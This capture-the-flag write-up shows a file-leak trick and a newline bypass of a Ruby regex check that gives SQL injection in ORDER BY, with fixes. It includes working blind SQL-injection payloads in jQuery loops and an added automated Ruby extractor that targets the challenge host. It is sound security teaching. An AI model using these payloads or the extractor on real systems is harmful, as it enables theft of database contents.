`![xxx](filename)` can leak any file (if you know the file name).
The server uses Ruby on Rails, and Rails standardizes controller file names as `app/controllers/name_controller.rb`, so I leaked `users_controller.rb` and `notes_controller.rb`.
- in notes_controller there is an SQLi vuln:
```ruby
def order
  order = params[:order]
  if order =~ /^(created_at|updated_at|title)$/
    order
  else
    'created_at'
  end
end
```
The check `if order =~ /^(created_at|updated_at|title)$/` can be bypassed with a newline (0x0a, `\n`): in Ruby, `^` and `$` match at line boundaries rather than at the start and end of the whole string, so `title\n<anything>` satisfies the regex (its first line is `title`) and the entire string, newline included, is returned and lands in the ORDER BY clause. The fix is to anchor with `\A` and `\z`, or better, to compare against an allowlist of column names.
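As an added example (not code from the challenge or from this write-up), the vulnerable method is reproduced beside two hardened versions and the newline payload is run through all three. `params` is replaced by a plain argument so it runs outside Rails.

```ruby
# Added example: why /^...$/ is bypassable in Ruby and two ways to close it.
# In Ruby, ^ and $ match at line boundaries, so a string whose FIRST line is an
# allowed column still matches even though everything after "\n" is attacker-controlled.

ALLOWED = %w[created_at updated_at title].freeze

# Mirrors the vulnerable controller method: the whole string is returned
# as soon as the regex matches on any line of it.
def vulnerable_order(param)
  if param =~ /^(created_at|updated_at|title)$/
    param
  else
    'created_at'
  end
end

# Fix 1: \A and \z anchor to the start and end of the whole string, not a line.
def fixed_order_anchors(param)
  if param =~ /\A(created_at|updated_at|title)\z/
    param
  else
    'created_at'
  end
end

# Fix 2 (preferred): allowlist comparison. Only a value from ALLOWED is ever
# returned, so nothing attacker-shaped reaches the ORDER BY clause.
def fixed_order_allowlist(param)
  ALLOWED.include?(param) ? param : 'created_at'
end

# The bypass: first line passes the check, second line is SQL.
PAYLOAD = "title\n|| (select 1 union select 2)"

if __FILE__ == $0
  p vulnerable_order(PAYLOAD)       # => "title\n|| (select 1 union select 2)"
  p fixed_order_anchors(PAYLOAD)    # => "created_at"
  p fixed_order_allowlist(PAYLOAD)  # => "created_at"
end
```

The allowlist version is the one to ship: it also survives a later refactor that turns the regex into something looser, because the return value can only ever be one of the three fixed strings.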
leak table name (one character per run; the position argument of `substr`, here 4, is changed by hand for each character):

```javascript
// Error-based blind oracle: only the request whose candidate byte equals the
// character at the probed position takes the THEN branch and returns 200.
// Every other request takes the ELSE branch, whose scalar subquery returns
// two rows, so the database raises an error and the request fails.
for (let i = 32; i <= 127; i++) {  // let: each callback keeps its own i
  $.ajax({
    type: 'get',
    url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select%20table_name%20from%20information_schema.columns%20where%20table_schema%20=%20%27public%27 and table_name!='notes'%20and table_name!='users' and table_name!='ar_internal_metadata' and table_name!='schema_migrations' limit 1),4,1))%3D" + i + "%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
    success: function (e, x, f) {
      // jQuery calls success only on a 2xx response, so the i logged here is the byte.
      console.log(i, String.fromCharCode(i), f.getAllResponseHeaders());
    }
  });
}
```
leak column name (same oracle, now reading `column_name` for the `fl4g` table found above; the position, here 1, is again stepped by hand):

```javascript
for (let i = 32; i <= 127; i++) {
  $.ajax({
    type: 'get',
    url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema%20=%20%27public%27 and table_name='fl4g' limit 1),1,1))%3D" + i + "%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
    success: function (e, x, f) {
      // Only the matching byte's request reaches this handler.
      console.log(i, String.fromCharCode(i), f.getAllResponseHeaders());
    }
  });
}
```
get flag (`select F1A6 from fl4g` didn't work, so I used an asterisk):

```javascript
// The leaked column name is F1A6; an unquoted identifier is folded to lowercase
// in PostgreSQL, which is the likely reason the named select failed. `select *`
// works because fl4g has a single column, so the subquery is still scalar.
for (let i = 32; i <= 127; i++) {
  $.ajax({
    type: 'get',
    url: "http://derailed.hackable.software/notes?order=title%0A%7C%7CCASE%20WHEN%20ascii(substr((select * from fl4g),9,1))=" + i + "%20THEN%201%20ELSE%20(select%201%20union%20select%202)%20END",
    success: function (e, x, f) {
      console.log(i, String.fromCharCode(i), f.getAllResponseHeaders());  // flag byte at position 9
    }
  });
}
```
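The three loops above each probe a single character position and the position is edited by hand between runs. As an added example (my code, not the author's script), the same oracle is generalised into a full extractor: it builds the identical `title\n||CASE WHEN ... END` payload, asks an oracle whether the request succeeded, and walks positions until no candidate byte matches. The HTTP oracle uses the challenge URL from the write-up; the simulated oracle is constructed for offline runs and assumes PostgreSQL semantics (`ascii('')` is 0, a scalar subquery returning two rows is an error), which the page's use of `information_schema` with `table_schema = 'public'` suggests but never states.

```ruby
require 'cgi'
require 'net/http'
require 'uri'

# Added example: automated error-based blind extraction over the ORDER BY injection.
TARGET = 'http://derailed.hackable.software/notes'  # challenge URL from the write-up

# Injected ORDER BY value for one (position, candidate byte) probe.
# "title\n" satisfies the /^...$/ check; everything after the newline is SQL.
def probe_order(subquery, pos, byte)
  "title\n||CASE WHEN ascii(substr((#{subquery}),#{pos},1))=#{byte} " \
    "THEN 1 ELSE (select 1 union select 2) END"
end

def probe_url(subquery, pos, byte)
  "#{TARGET}?order=#{CGI.escape(probe_order(subquery, pos, byte))}"
end

# Live oracle: true iff the server answered 200. The ELSE branch's two-row
# scalar subquery makes the query error, which surfaces as a non-200 response.
def http_oracle(subquery, pos, byte)
  Net::HTTP.get_response(URI(probe_url(subquery, pos, byte))).is_a?(Net::HTTPOK)
end

# Simulated oracle (constructed for this example): behaves as if the subquery
# returned `secret`. Past the end of the string substr yields '' and ascii('')
# is 0 in PostgreSQL, so no candidate in 32..127 matches and extraction stops.
def simulated_oracle(secret)
  lambda do |_subquery, pos, byte|
    ch = secret[pos - 1]
    (ch.nil? ? 0 : ch.ord) == byte
  end
end

# Recover the scalar result of `subquery` one byte at a time (1-based positions),
# 96 requests per character at most, stopping at the first position with no hit.
def extract(subquery, oracle, max_len: 64)
  out = +''
  (1..max_len).each do |pos|
    byte = (32..127).find { |b| oracle.call(subquery, pos, b) }
    break if byte.nil?
    out << byte.chr
  end
  out
end

if __FILE__ == $0
  q = 'select * from fl4g'
  puts extract(q, simulated_oracle('DrgnS{example}'))  # constructed secret, not the real flag
  # Against the live target: puts extract(q, method(:http_oracle))
end
```

Passing the oracle in as a callable keeps the payload construction and the stop condition testable without the target; swapping in `method(:http_oracle)` runs the same loop against the real host, sequentially, so each position is settled before the next one is probed.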